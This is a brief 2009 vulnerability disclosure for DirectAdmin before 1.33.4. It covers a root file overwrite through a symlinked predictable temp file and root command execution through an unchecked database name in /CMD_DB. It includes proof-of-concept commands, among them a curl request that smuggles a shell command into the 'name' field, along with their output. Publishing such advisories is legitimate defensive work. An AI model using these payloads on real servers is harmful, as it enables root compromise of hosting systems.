Subject: DirectAdmin < 1.33.4 Local file overwrite & Local root escalation Author: Anonymous ReleaseID: d8253f15e447935c24ab38a215735931942a77717d7b55d84200d070d1e54d3b Date: 22-04-2009 The issue on http://www.directadmin.com/features.php?id=968 is larger than the wording would indicate. It fixes two issues in /CMD_DB. --- Local file overwrite --- action=backup runs a mysqldump as root and generates a predictable temporary file in the temporary directory defined as tmpdir in /usr/local/directadmin/conf: "$tmpdir/${dbname}.gz". It does not check if the file exists before piping the output of "mysqldump | gzip" into it, allowing any DA user to create or overwrite any file on the server as root. PoC: On server: $ ln -s /etc/poc /home/tmp/database_name.gz On client: $ curl http://directadminserver:2222/CMD_DB/database_name.gz On server: $ ls -la /etc/poc -rw-r--r-- 1 root root 514 Apr 22 09:05 /etc/poc $ zcat /etc/poc | head -1 -- MySQL dump 10.9 --- Local root escalation --- action=restore runs a "gunzip | mysql $dbname" as root, with $dbname being unchecked, allowing any DA user to run any code as root. PoC: On client: curl -n -F action=restore -F domain=poc.com -F 'file1=@database.gz' -F method=default -F 'name=poc_db;echo poc > /etc/poc' http://directadminserver:2222/CMD_DB On server: $ ls -la /etc/poc -rw-r--r-- 1 root root 5 Apr 22 10:30 /etc/poc $ cat /etc/poc test -- Anonymous